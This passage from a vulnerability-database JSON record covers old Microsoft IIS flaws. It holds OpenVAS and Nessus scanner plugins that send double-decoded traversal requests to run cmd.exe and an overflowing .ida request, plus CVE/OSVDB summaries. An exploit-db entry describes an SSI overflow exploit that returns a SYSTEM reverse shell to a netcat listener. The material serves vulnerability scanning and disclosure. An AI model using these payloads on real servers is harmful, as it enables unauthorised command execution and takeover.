vuln-dev)\n\nfor(d=0;dir[d];d=d+1)\n{\n\tfor(i=0;uni[i];i=i+1)\n\t{\n\t\turl = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd);\n\t\tif(check(req:url))exit(0);\n\t}\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-01-08T12:24:14", "bulletinFamily": "scanner", "description": "When IIS receives a user request to run a script, it renders\n the request in a decoded canonical form, then performs security checks on the decoded request.", "modified": "2020-01-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010671", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010671", "title": "IIS Remote Command Execution", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# Description: IIS Remote Command Execution\n#\n# Authors:\n# Matt Moore (matt@westpoint.ltd.uk)\n# derived from the NASL script to test for the UNICODE directory traversal\n# vulnerability, originally written by Renaud Deraison.\n# Then Renaud took Matt's script and used H D Moore modifications\n# to iis_dir_traversal.nasl ;)\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore / H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10671\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0006\");\n script_bugtraq_id(2708, 3193);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0507\", \"CVE-2001-0333\");\n script_name(\"IIS Remote Command Execution\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore / H D Moore\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/banner\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/ms01-044\");\n\n script_tag(name:\"solution\", value:\"See MS advisory MS01-026(Superseded by ms01-044)\");\n\n script_tag(name:\"summary\", value:\"When IIS receives a user request to run a script, it renders\n the request in a decoded canonical form, then performs security checks on the decoded request.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability results because a second, superfluous decoding pass is\n performed after the initial security checks are completed. Thus, a specially crafted request could allow\n an attacker to execute arbitrary commands on the IIS Server.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif( ! banner || \"Microsoft/IIS\" >!< banner )\n exit(0);\n\ndir[0] = \"/scripts/\";\ndir[1] = \"/msadc/\";\ndir[2] = \"/iisadmpwd/\";\ndir[3] = \"/_vti_bin/\";\t\t# FP\ndir[4] = \"/_mem_bin/\";\t\t# FP\ndir[5] = \"/exchange/\";\t\t# OWA\ndir[6] = \"/pbserver/\";\t\t# Win2K\ndir[7] = \"/rpc/\";\t\t# Win2K\ndir[8] = \"/cgi-bin/\";\ndir[9] = \"/\";\n\nuni[0] = \"%255c\"; \tdots[0] = \"..\";\nuni[1] = \"%%35c\";\tdots[1] = \"..\";\nuni[2] = \"%%35%63\";\tdots[2] = \"..\";\nuni[3] = \"%25%35%63\"; dots[3] = \"..\";\nuni[4] = \"%252e\";\tdots[4] = \"/.\";\n\nfunction check(url) {\n req = http_get(item:url, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if(!res)\n return(0);\n\n pat = \"<DIR>\";\n pat2 = \"Directory of C\";\n\n if((pat >< res) || (pat2 >< res)) {\n report = report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n return(1);\n }\n return(0);\n}\n\n\ncmd = \"/winnt/system32/cmd.exe?/c+dir+c:\\\\+/OG\";\nfor(d = 0; dir[d]; d++) {\n for(i = 0; uni[i]; i++) {\n url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd);\n if(check(url:url))\n exit(0);\n }\n}\n\n# Slight variation- do the same, but don't put dots[i] in front of cmd (reported on vuln-dev)\nfor(d = 0; dir[d]; d++) {\n for(i = 0; uni[i]; i++) {\n url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd);\n if(check(url:url))\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-03-18T00:52:39", "bulletinFamily": "scanner", "description": "There", "modified": "2020-03-02T00:00:00", "id": "IIS_ISAPI_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10685", "published": "2001-06-19T00:00:00", "title": "Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script was written by Renaud Deraison <deraison@cvs.nessus.org>\n# It was modified by H D Moore to not crash the server during the test\n#\n# Supercedes MS01-033\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10685);\n script_version (\"1.51\");\n script_cve_id( \"CVE-2001-0544\", \"CVE-2001-0545\", \"CVE-2001-0506\", \"CVE-2001-0507\", \"CVE-2001-0508\", \"CVE-2001-0500\");\n script_bugtraq_id(2690, 2880, 3190, 3193, 3194, 3195);\n script_xref(name:\"MSFT\", value:\"MS01-033\");\n script_xref(name:\"MSFT\", value:\"MS01-044\");\n script_xref(name:\"MSKB\", value:\"294774\");\n script_xref(name:\"MSKB\", value:\"297860\");\n script_xref(name:\"MSKB\", value:\"298340\");\n script_xref(name:\"MSKB\", value:\"300972\");\n script_xref(name:\"MSKB\", value:\"301625\");\n script_xref(name:\"MSKB\", value:\"304867\");\n script_xref(name:\"MSKB\", value:\"305359\");\n\n script_name(english:\"Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"There's a buffer overflow in the remote web server through\nthe ISAPI filter.\n \nIt is possible to overflow the remote web server and execute \ncommands as user SYSTEM.\n\nAdditionally, other vulnerabilities exist in the remote web\nserver since it has not been patched.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-033\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patches from the bulletins above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2001/06/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/05/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\nscript_end_attributes();\n\n\n script_summary(english:\"Tests for a remote buffer overflow in IIS\");\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\", \"www_fingerprinting_hmap.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n# The attack starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nb = get_http_banner(port: port);\nif (\"IIS\" >!< h ) exit(0);\n \n \nw = http_send_recv3(method: \"GET\", port: port,\n item: \"/x.ida?\"+crap(length:220, data:\"x\")+\"=x\");\nif (isnull(w)) exit(1, \"the web server did not answer\");\nr = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # 0xc0000005 == \"Access Violation\"\n if (\"0xc0000005\" >< r)\n {\n security_hole(port);\n }\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T00:52:38", "bulletinFamily": "scanner", "description": "When IIS receives a user request to run a script, it renders the\nrequest in a decoded canonical form, and then performs security checks\non the decoded request. A vulnerability results because a second,\nsuperfluous decoding pass is performed after the initial security checks\nare completed. Thus, a specially crafted request could allow an\nattacker to execute arbitrary commands on the IIS Server.", "modified": "2020-03-02T00:00:00", "id": "IIS_DECODE_BUG.NASL", "href": "https://www.tenable.com/plugins/nessus/10671", "published": "2001-05-15T00:00:00", "title": "MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)", "type": "nessus", "sourceData": "#\n# This script was modified Matt Moore (matt@westpoint.ltd.uk)\n# from the NASL script to test for the UNICODE directory traversal\n# vulnerability, originally written by Renaud Deraison.\n#\n# Then Renaud took Matt's script and used H D Moore modifications\n# to iis_dir_traversal.nasl ;)\n#\n\n# Changes by Tenable:\n# - Touched up description (11/04/10)\n# - Add MSKB script_xref (8/29/17)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10671);\n script_version(\"1.61\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2001-0333\", \"CVE-2001-0507\");\n script_bugtraq_id(2708, 3193);\n script_xref(name:\"MSFT\", value:\"MS01-026\");\n script_xref(name:\"MSFT\", value:\"MS01-044\");\n script_xref(name:\"MSKB\", value:\"288855\");\n script_xref(name:\"MSKB\", value:\"293826\");\n script_xref(name:\"MSKB\", value:\"294370\");\n script_xref(name:\"MSKB\", value:\"294774\");\n script_xref(name:\"MSKB\", value:\"295534\");\n script_xref(name:\"MSKB\", value:\"297860\");\n script_xref(name:\"MSKB\", value:\"298340\");\n script_xref(name:\"MSKB\", value:\"301625\");\n script_xref(name:\"MSKB\", value:\"304867\");\n script_xref(name:\"MSKB\", value:\"305359\");\n\n script_name(english:\"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)\");\n script_summary(english:\"Determines if arbitrary commands can be executed\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"Arbitrary commands can be executed on the remote web server.\");\n script_set_attribute(attribute:\"description\", value:\n\"When IIS receives a user request to run a script, it renders the\nrequest in a decoded canonical form, and then performs security checks\non the decoded request. A vulnerability results because a second,\nsuperfluous decoding pass is performed after the initial security checks\nare completed. Thus, a specially crafted request could allow an\nattacker to execute arbitrary commands on the IIS Server.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for IIS 4.0 and 5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Matt Moore / H D Moore\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\", \"www_fingerprinting_hmap.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif ( \"IIS\" >!< banner ) exit(0);\n\nif ( banner =~ \"Microsoft-IIS/[6-9]\" ) exit(0);\n\nif(!get_port_state(port))exit(0);\n\n\ndir[0] = \"/scripts/\";\ndir[1] = \"/msadc/\";\ndir[2] = \"/iisadmpwd/\";\ndir[3] = \"/_vti_bin/\";\t\t# FP\ndir[4] = \"/_mem_bin/\";\t\t# FP\ndir[5] = \"/exchange/\";\t\t# OWA\ndir[6] = \"/pbserver/\";\t\t# Win2K\ndir[7] = \"/rpc/\";\t\t# Win2K\ndir[8] = \"/cgi-bin/\";\ndir[9] = \"/\";\n\nuni[0] = \"%255c\"; \tdots[0] = \"..\";\nuni[1] = \"%%35c\";\tdots[1] = \"..\";\nuni[2] = \"%%35%63\";\tdots[2] = \"..\";\nuni[3] = \"%25%35%63\"; dots[3] = \"..\";\nuni[4] = \"%252e\";\tdots[4] = \"/.\";\n\n\n\n\nfunction check(req)\n{\n local_var\tr, pat, pat2;\n r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port));\n if(r == NULL)\n {\n exit(0);\n }\n\n pat = \"<DIR>\";\n pat2 = \"Directory of C\";\n\n if((pat >< r) || (pat2 >< r)){\n \tsecurity_hole(port:port, extra:\nstrcat('\\n Requesting\\n ', build_url(port: port, qs: req), '\\n produces :\\n\\n', r));\n\treturn(1);\n \t}\n return(0);\n}\n\n\ncmd = \"/winnt/system32/cmd.exe?/c+dir+c:\\\\+/OG\";\nfor(d=0;dir[d];d=d+1)\n{\n\tfor(i=0;uni[i];i=i+1)\n\t{\n\t\turl = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd);\n\t\tif(check(req:url))exit(0);\n\t}\n}\n\n\n# Slight variation- do the same, but don't put dots[i] in front\n# of cmd (reported on vuln-dev)\n\nfor(d=0;dir[d];d=d+1)\n{\n\tfor(i=0;uni[i];i=i+1)\n\t{\n\t\turl = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd);\n\t\tif(check(req:url))exit(0);\n\t}\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:07:37", "bulletinFamily": "NVD", "description": "Vulnerability in IIS 5.0 allows remote attackers to cause a denial of service (restart) via a long, invalid WebDAV request.", "modified": "2018-10-30T16:25:00", "id": "CVE-2001-0508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0508", "published": "2001-09-20T04:00:00", "title": "CVE-2001-0508", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:07:37", "bulletinFamily": "NVD", "description": "Buffer overflow in ssinc.dll in IIS 5.0 and 4.0 allows local users to gain system privileges via a Server-Side Includes (SSI) directive for a long filename, which triggers the overflow when the directory name is added, aka the \"SSI privilege elevation\" vulnerability.", "modified": "2018-10-30T16:25:00", "id": "CVE-2001-0506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0506", "published": "2001-09-20T04:00:00", "title": "CVE-2001-0506", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:07:37", "bulletinFamily": "NVD", "description": "IIS 4.0 with URL redirection enabled allows remote attackers to cause a denial of service (crash) via a malformed request that specifies a length that is different than the actual length.", "modified": "2018-10-12T21:30:00", "id": "CVE-2001-0545", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0545", "published": "2001-10-30T05:00:00", "title": "CVE-2001-0545", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:07:37", "bulletinFamily": "NVD", "description": "IIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the \"System file listing privilege elevation\" vulnerability.", "modified": "2018-10-30T16:25:00", "id": "CVE-2001-0507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0507", "published": "2001-09-20T04:00:00", "title": "CVE-2001-0507", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:07:37", "bulletinFamily": "NVD", "description": "IIS 5.0 allows local users to cause a denial of service (hang) via by installing content that produces a certain invalid MIME Content-Type header, which corrupts the File Type table.", "modified": "2018-10-30T16:25:00", "id": "CVE-2001-0544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0544", "published": "2001-10-30T05:00:00", "title": "CVE-2001-0544", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nMicrosoft IIS contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when exploiting the relative path listings in a table that lists the system files. This flaw may lead to a loss of confidentiality and/or integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft IIS contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when exploiting the relative path listings in a table that lists the system files. This flaw may lead to a loss of confidentiality and/or integrity.\n## References:\nSecurity Tracker: 1002212 \n[Related OSVDB ID: 5670](https://vulners.com/osvdb/OSVDB:5670)\nOther Advisory URL: http://www.networkassociates.com/us/security/resources/sv_ent06.htm\nMicrosoft Security Bulletin: MS01-044\nMail List Post: http://www.securityfocus.com/archive/1/205069\nKeyword: aka the \"system file listing privilege elevation vulnerability\"\nISS X-Force ID: 6981\nISS X-Force ID: 6985\nGeneric Exploit URL: http://www.digitaloffense.net/iiscrack/\n[CVE-2001-0507](https://vulners.com/cve/CVE-2001-0507)\n[CVE-2001-0545](https://vulners.com/cve/CVE-2001-0545)\nCIAC Advisory: L-132\nBugtraq ID: 3193\n", "modified": "2001-08-15T23:11:04", "published": "2001-08-15T23:11:04", "href": "https://vulners.com/osvdb/OSVDB:5736", "id": "OSVDB:5736", "title": "Microsoft IIS Relative Path System Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when submitting a WebDAV 'PROPFIND' request containing numerous semicolons to the server. This will cause the IIS service to fail and restart, resulting in a loss of availability.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when submitting a WebDAV 'PROPFIND' request containing numerous semicolons to the server. This will cause the IIS service to fail and restart, resulting in a loss of availability.\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp\n[Related OSVDB ID: 5633](https://vulners.com/osvdb/OSVDB:5633)\n[Nessus Plugin ID:10667](https://vulners.com/search?query=pluginID:10667)\n[Nessus Plugin ID:10631](https://vulners.com/search?query=pluginID:10631)\nISS X-Force ID: 6982\nGeneric Exploit URL: http://www.guninski.com/iispropover2.html\n[CVE-2001-0508](https://vulners.com/cve/CVE-2001-0508)\nCERT VU: 959211\nBugtraq ID: 2690\n", "modified": "2001-05-06T00:00:00", "published": "2001-05-06T00:00:00", "id": "OSVDB:5606", "href": "https://vulners.com/osvdb/OSVDB:5606", "title": "Microsoft IIS WebDAV PROPFIND Request DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when submitting a malformed or extremely long WebDAV request, causing all IIS related services to fail and restart, resulting in a loss of availability.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (MS01-044) to address this vulnerability.\n## Short Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when submitting a malformed or extremely long WebDAV request, causing all IIS related services to fail and restart, resulting in a loss of availability.\n## References:\nSecurity Tracker: 1001483\n[Related OSVDB ID: 5606](https://vulners.com/osvdb/OSVDB:5606)\nMicrosoft Security Bulletin: MS01-044\nKeyword: webdav\nISS X-Force ID: 6982\nGeneric Exploit URL: http://www.guninski.com/iispropover2.html\n[CVE-2001-0508](https://vulners.com/cve/CVE-2001-0508)\nCERT VU: 959211\nBugtraq ID: 3194\n", "modified": "2001-05-06T00:00:00", "published": "2001-05-06T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:5633", "id": "OSVDB:5633", "title": "Microsoft IIS Invalid WebDAV Request DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when sending certain malformed packets and will result in loss of availability for the web server.\n## Solution Description\nMicrosoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue is triggered when sending certain malformed packets and will result in loss of availability for the web server.\n## References:\nSecurity Tracker: 1002212\n[Related OSVDB ID: 5736](https://vulners.com/osvdb/OSVDB:5736)\nMicrosoft Security Bulletin: MS01-044\nISS X-Force ID: 6981\n[CVE-2001-0545](https://vulners.com/cve/CVE-2001-0545)\nCIAC Advisory: l-132\n", "modified": "2001-08-15T23:11:04", "published": "2001-08-15T23:11:04", "id": "OSVDB:5670", "href": "https://vulners.com/osvdb/OSVDB:5670", "title": "Microsoft IIS URL Redirection Malformed Length DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMicrosoft Security Bulletin: MS01-044\nKeyword: aka \"SSI privilege elevation\"\nISS X-Force ID: 6984\n[CVE-2001-0506](https://vulners.com/cve/CVE-2001-0506)\nCIAC Advisory: L-132\nBugtraq ID: 3190\n", "modified": "2001-08-15T00:00:00", "published": "2001-08-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1930", "id": "OSVDB:1930", "type": "osvdb", "title": "Microsoft IIS SSI ssinc.dll Filename Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue occurs when an attacker sends a URL request with a different length than the one specified in the request. This results in an access violation causing IIS to crash and must be restarted. This vulnerability only occurs when URL redirection has been enabled.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft IIS contains a flaw that may allow a remote denial of service. The issue occurs when an attacker sends a URL request with a different length than the one specified in the request. This results in an access violation causing IIS to crash and must be restarted. This vulnerability only occurs when URL redirection has been enabled.\n## References:\nSecurity Tracker: 1002212\n[Related OSVDB ID: 5670](https://vulners.com/osvdb/OSVDB:5670)\nMicrosoft Security Bulletin: MS01-044\nISS X-Force ID: 6981\n[CVE-2001-0545](https://vulners.com/cve/CVE-2001-0545)\nCIAC Advisory: l-132\nCERT VU: 544555\n", "modified": "2001-08-15T23:11:04", "published": "2001-08-15T23:11:04", "href": "https://vulners.com/osvdb/OSVDB:5584", "id": "OSVDB:5584", "title": "Microsoft IIS URL Redirection Malformed Length DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 6983\n[CVE-2001-0544](https://vulners.com/cve/CVE-2001-0544)\nBugtraq ID: 3195\n", "modified": "2001-08-15T00:00:00", "published": "2001-08-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1931", "id": "OSVDB:1931", "type": "osvdb", "title": "Microsoft IIS MIME Content-Type Header DoS", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:37:08", "bulletinFamily": "exploit", "description": "Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability. CVE-2001-0507 . Local exploit for windows platform", "modified": "2001-08-15T00:00:00", "published": "2001-08-15T00:00:00", "id": "EDB-ID:21072", "href": "https://www.exploit-db.com/exploits/21072/", "type": "exploitdb", "title": "Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/3193/info\r\n\r\nA vulnerability exists in Microsoft's Internet Information Services 5.0 which could allow a user with write permission to run any code with System privileges. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21072.zip", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21072/"}, {"lastseen": "2016-02-02T15:37:00", "bulletinFamily": "exploit", "description": "Microsoft IIS 4/5 SSI Buffer Overrun Privelege Elevation. CVE-2001-0506 . Local exploit for windows platform", "modified": "2001-08-15T00:00:00", "published": "2001-08-15T00:00:00", "id": "EDB-ID:21071", "href": "https://www.exploit-db.com/exploits/21071/", "type": "exploitdb", "title": "Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation", "sourceData": "source: http://www.securityfocus.com/bid/3190/info\r\n\r\nA vulnerability exists in Microsoft IIS 4.0 and 5.0 that could allow a user with permission to write content to the IIS server to run any code in Local System context.\r\n\r\n/*\tjim.c - IIS Server Side Include exploit by\r\nIndigo <indig0@talk21.com> 2001\r\n\r\n\tUsage: jim <attacker host> <attacker port>\r\n\r\n\tThis code has been compiled and tested\r\non Linux and Win32\r\n\r\n\tTo exploit this vulnerability you must have\r\nwrite access to the web root of the\r\n\ttarget web server. This program will\r\ngenerate a file called ssi.shtml.\r\n\tCreate a directory in the web root whose\r\nname is 12 characters long (this is important!)\r\n\teg. ssi_overflow then put this file into the\r\nnew directory. Start up a netcat listener:\r\n\r\n\tnc -l -p <attacker port> -vv\r\n\r\n \tAccess the file\r\nhttp://target/ssi_overflow/ssi.shtml using a web\r\nbrowser.\r\n\tN.B. I have had problems using Netscape\r\nto do this but IE works fine.\r\n\r\n\tA SYSTEM shell will appear in the Netcat\r\nsession.\r\n\r\n\tYou may need to hit return a few times to\r\nget the prompt up.\r\n\r\n\tMain shellcode adapted from jill.c by dark\r\nspyrit <dspyrit@beavuh.org>\r\n\r\n\tGreets 